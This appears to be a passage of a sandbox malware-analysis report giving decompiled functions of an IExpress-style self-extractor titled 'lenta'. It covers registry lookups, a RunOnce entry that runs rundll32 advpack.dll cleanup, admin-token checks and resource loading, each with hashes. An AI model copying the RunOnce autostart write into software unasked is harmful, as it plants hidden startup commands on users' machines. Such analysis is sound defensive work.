Part of subcall function 0094681F: RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,?,0000000C), ref: 009468F4
Part of subcall function 0094681F: RegCloseKey.ADVAPI32(?), ref: 00946902

Strings

lenta, xrefs: 00944545, 0094465A
LoadString() Error. Could not load string resource., xrefs: 009444E4

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lenta
API String ID: 3244514340-1000497449
Opcode ID: 57a5255ebb348139ef738d4983d0004e50fa3e81be93b9e53a91b3e88f4da455
Instruction ID: 87e7228e07a3243943b67b59f2cc174e83faaa18c4f8ca6daa341dbd5ca973f2
Opcode Fuzzy Hash: 57a5255ebb348139ef738d4983d0004e50fa3e81be93b9e53a91b3e88f4da455
Instruction Fuzzy Hash: B3511176904219AFDF219F28DC48FAABBB8EF86304F014194FD09A7241DB31DE45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00942773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00942773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x948004; // 0xec518a5e
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00941781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0094658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0094658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x941140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00941680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00946CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00942773
0x0094277e
0x00942785
0x0094278a
0x0094278d
0x00942790
0x00942792
0x00942798
0x0094279d
0x009428b2
0x00000000
0x009427a3
0x009427a3
0x009427af
0x009427c2
0x009427c8
0x009427cd
0x009427d5
0x009428b7
0x009428b9
0x00000000
0x009427db
0x009427dd
0x009428aa
0x00000000
0x009427e3
0x009427e3
0x009427ec
0x009427f8
0x00942803
0x0094280b
0x00942831
0x009428c3
0x009428c9
0x009428cd
0x00942837
0x0094285a
0x0094285c
0x00942865
0x00942892
0x00942895
0x00000000
0x00000000
0x00942867
0x00942878
0x0094288c
0x00000000
0x0094287a
0x00942880
0x00942885
0x00942897
0x00942899
0x00942899
0x00942878
0x00942865
0x009428a0
0x009428bf
0x009428c1
0x00000000
0x00000000
0x009428c1
0x00942831
0x009427dd
0x009427d5
0x009428e5

APIs

CharUpperA.USER32(EC518A5E,00000000,00000000,00000000), ref: 009427A8
CharNextA.USER32(0000054D), ref: 009427B5
CharNextA.USER32(00000000), ref: 009427BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942829
RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009428A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 009428AA
GetSystemDirectoryA.KERNEL32 ref: 009428B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 009427E4

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 102c552b11804ab31b0f88c967a60553b1bdbc9e13213c1613e3e4c907769d48
Instruction ID: d8be80ed2a85f73cf7c4a1efdcf190088ed1658c0632463fb8b3bead93e37b99
Opcode Fuzzy Hash: 102c552b11804ab31b0f88c967a60553b1bdbc9e13213c1613e3e4c907769d48
Instruction Fuzzy Hash: 8841C375A1812CAFDB249B649C85EEE7BBCEF56700F4000A9F645D2200DB708E859FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00942267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00942267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x948004; // 0xec518a5e
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x948530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0094658A( &_v268, 0x104, 0x941140);
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
							E0094171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00946CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00942272
0x00942277
0x00942279
0x00942283
0x00942289
0x009422ab
0x009422b1
0x009422c4
0x009422e0
0x009422e6
0x009422f5
0x0094230d
0x0094231c
0x0094231c
0x00942321
0x0094233a
0x00942342
0x00942348
0x0094234b
0x0094234c
0x0094234c
0x0094234e
0x0094234f
0x0094236e
0x0094236e
0x0094237a
0x00942380
0x00942380
0x00942381
0x00942381
0x0094238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 009422A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 009422D8
memset.MSVCRT ref: 009422F5
GetSystemDirectoryA.KERNEL32 ref: 00942305
RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0094236E
RegCloseKey.ADVAPI32(?), ref: 0094237A

Strings

wextract_cleanup1, xrefs: 0094227C, 009422CD, 00942363
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00942321
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0094232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00942299

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
API String ID: 3027380567-2836157002
Opcode ID: 703ef017b4b1dd2931d9c679aef8798ab026a26072ff86b8c1de5df2c3f490c5
Instruction ID: b742ee6971ae46714a63da2da6b74453620bc0bd6fe030d1037dfeca335d2e2b
Opcode Fuzzy Hash: 703ef017b4b1dd2931d9c679aef8798ab026a26072ff86b8c1de5df2c3f490c5
Instruction Fuzzy Hash: CD31B175A04218ABDB219B60DC49FEBBB7CEF96704F0001E9F54DA6051EA71AF88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00943100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00943100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x948590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x948590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E009443D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x948d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x9488b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E009430C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00943108
0x0094310b
0x009431b7
0x009431ca
0x009431d0
0x009431d0
0x009431da
0x00000000
0x009431da
0x00943111
0x00943114
0x00943136
0x00943136
0x00943138
0x0094313b
0x00943141
0x00000000
0x00943143
0x00943116
0x0094311b
0x0094314b
0x00943151
0x00943158
0x0094316a
0x00943176
0x0094317d
0x0094318b
0x0094319e
0x009431a3
0x00000000
0x009431ad
0x00943120
0x00000000
0x00000000
0x0094312a
0x00943134
0x00000000
0x00000000
0x00000000
0x00943134
0x0094312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0094313B
GetDesktopWindow.USER32 ref: 0094314B
SetDlgItemTextA.USER32(?,00000834), ref: 0094316A
SetWindowTextA.USER32(?,lenta), ref: 00943176
SetForegroundWindow.USER32(?), ref: 0094317D
GetDlgItem.USER32(?,00000834), ref: 00943185
GetWindowLongA.USER32(00000000,000000FC), ref: 00943190
SetWindowLongA.USER32(00000000,000000FC,009430C0), ref: 009431A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 009431CA

Strings

lenta, xrefs: 00943170

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lenta
API String ID: 3785188418-2780258678
Opcode ID: fd79c3c324c563f8b47fd278fdd1d215afef49c7b67fbdd95ca8a1b3c662d543
Instruction ID: ea82cef8971fe592a3aac0750ee533c88b6b6be25227e9bffd4bab887e12d665
Opcode Fuzzy Hash: fd79c3c324c563f8b47fd278fdd1d215afef49c7b67fbdd95ca8a1b3c662d543
Instruction Fuzzy Hash: 0311D3352AC261BBEB219F34AC0CF5F3A68FB5F724F108611F925911E0DBB49641E746

Uniqueness

Uniqueness Score: -1.00%

Function 009418A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E009418A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x948004; // 0xec518a5e
				_v8 = _t23 ^ _t53;
				_t25 =  *0x948128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00946CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E009417EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x948128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x948128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x009418a3
0x009418a3
0x009418ab
0x009418b2
0x009418b5
0x009418be
0x009418c0
0x009418c6
0x009418c7
0x009418ca
0x009418cf
0x009419c9
0x009419d8
0x009419d8
0x009418df
0x009419b8
0x009419bd
0x009419bf
0x009419bf
0x00000000
0x009419bd
0x009418fa
0x00000000
0x00000000
0x00941912
0x009419aa
0x009419ad
0x009419b3
0x00000000
0x00941927
0x00941927
0x00941932
0x00941936
0x009419a9
0x009419a9
0x00000000
0x009419a9
0x0094194c
0x009419a2
0x009419a3
0x00000000
0x0094196e
0x00941970
0x00941999
0x0094199c
0x00000000
0x0094199c
0x00941972
0x00941972
0x00941975
0x00941984
0x00941985
0x0094198a
0x00000000
0x00000000
0x00000000
0x0094198c
0x00941991
0x00941996
0x00000000
0x00941996
0x0094194c

APIs

Part of subcall function 009417EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009418DD), ref: 0094181A
Part of subcall function 009417EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0094182C
Part of subcall function 009417EE: AllocateAndInitializeSid.ADVAPI32(009418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009418DD), ref: 00941855
Part of subcall function 009417EE: FreeSid.ADVAPI32(?,?,?,?,009418DD), ref: 00941883
Part of subcall function 009417EE: FreeLibrary.KERNEL32(00000000,?,?,?,009418DD), ref: 0094188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 009418EB
OpenProcessToken.ADVAPI32(00000000), ref: 009418F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0094190A
GetLastError.KERNEL32 ref: 00941918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0094192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00941944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00941964
EqualSid.ADVAPI32(00000004,?), ref: 0094197A
FreeSid.ADVAPI32(?), ref: 0094199C
LocalFree.KERNEL32(00000000), ref: 009419A3
CloseHandle.KERNEL32(?), ref: 009419AD

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 7b034dec88afbc5d2031382aecb6bb50b5d8563622b62dbfd464193e0cef3578
Instruction ID: 08e95f2878479333d53b5b59cdc4903fd0546ed9e31e27dccf628088dcc7c6d7
Opcode Fuzzy Hash: 7b034dec88afbc5d2031382aecb6bb50b5d8563622b62dbfd464193e0cef3578
Instruction Fuzzy Hash: ED315E75A14209AFDB20DFA5EC98EBFBBBCFF0A344F100429E545E2150EB319945EB61

Uniqueness

Uniqueness Score: -1.00%

Function 0094468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0094468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00944699
0x0094469b
0x009446a9
0x009446af
0x009446b4
0x009446bc
0x009446f9
0x00000000
0x009446f9
0x009446d9
0x009446dd
0x00000000
0x00000000
0x009446e5
0x009446ef
0x00000000
0x009446f5
0x009446ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
memcpy_s.MSVCRT ref: 009446E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

Strings

lenta, xrefs: 009446E4
TITLE, xrefs: 0094469D, 009446C0

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lenta
API String ID: 3370778649-2035842925
Opcode ID: ec366f152ebf8acf5460b8dcf36695224f8c72d2817b67ad4d898def2c481495
Instruction ID: e57c1919d53aa582217134883b663e932b64a41793df7e5c195b59e35108780d
Opcode Fuzzy Hash: ec366f152ebf8acf5460b8dcf36695224f8c72d2817b67ad4d898def2c481495
Instruction Fuzzy Hash: 3301683A6983107BF3201BA56C4DF6B7F2CDBCBF62F054014FA4997191C9B18C41A6B6

Uniqueness

Uniqueness Score: -1.00%

Function 009417EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E009417EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x948004; // 0xec518a5e
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x94a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00946CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x009417f6
0x009417fd
0x00941805
0x0094180b
0x0094180d
0x00941815
0x00941818
0x00941820
0x00941824
0x0094182c
0x00941832
0x00941837
0x00941851
0x00941854
0x0094185d
0x00941862
0x0094186c
0x00941872
0x00941877
0x0094187e
0x0094187e
0x00941883
0x00941883
0x0094185d
0x0094188a
0x0094188a
0x009418a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009418DD), ref: 0094181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0094182C
AllocateAndInitializeSid.ADVAPI32(009418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009418DD), ref: 00941855
FreeSid.ADVAPI32(?,?,?,?,009418DD), ref: 00941883
FreeLibrary.KERNEL32(00000000,?,?,?,009418DD), ref: 0094188A

Strings

advapi32.dll, xrefs: 00941810
CheckTokenMembership, xrefs: 00941826

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 2b3c04daec980ff2af8e1c69242e5b44c3128eed4e51485608fb8547a99343d6
Instruction ID: 59806b4b2d020d0df3aab18b74c4c826a8cbc47efc2655dd4097e0d46eb90407
Opcode Fuzzy Hash: 2b3c04daec980ff2af8e1c69242e5b44c3128eed4e51485608fb8547a99343d6
Instruction Fuzzy Hash: 4D11B675E54209AFDB109FA4DC49EBEBB78EF4A701F10016AFA01E3390DB708D409B91

Uniqueness

Uniqueness Score: -1.00%

Function 00943450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00943450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E009443D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0x949404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x9491dc = 1;
					goto L8;
				}
				return 0;
			}

0x00943459
0x0094345c
0x009434d8
0x009434de
0x00000000
0x009434e0
0x0094345e
0x00943463
0x0094349a
0x009434a0
0x009434a7
0x009434b2
0x009434c4
0x009434cb
0x00000000
0x009434cb
0x00943468
0x0094346e
0x00943474
0x00000000
0x00000000
0x0094347c
0x0094348c
0x00943490
0x00000000
0x00943496
0x00943484
0x00000000
0x00000000
0x00943486
0x00000000
0x00943486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00943490
GetDesktopWindow.USER32 ref: 0094349A
SetWindowTextA.USER32(?,lenta), ref: 009434B2
SetDlgItemTextA.USER32(?,00000838), ref: 009434C4
SetForegroundWindow.USER32(?), ref: 009434CB
EndDialog.USER32(?,00000002), ref: 009434D8

Strings

lenta, xrefs: 009434AC

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lenta
API String ID: 852535152-2780258678
Opcode ID: a722b7b2c1e0cb8d7fdbb8967766c81385f26c8d9f5d17e11527635300412725
Instruction ID: 57e1be61c6ce71483f07cbc2d1b967ce3afb4177473f9639d96561c5adb7d921
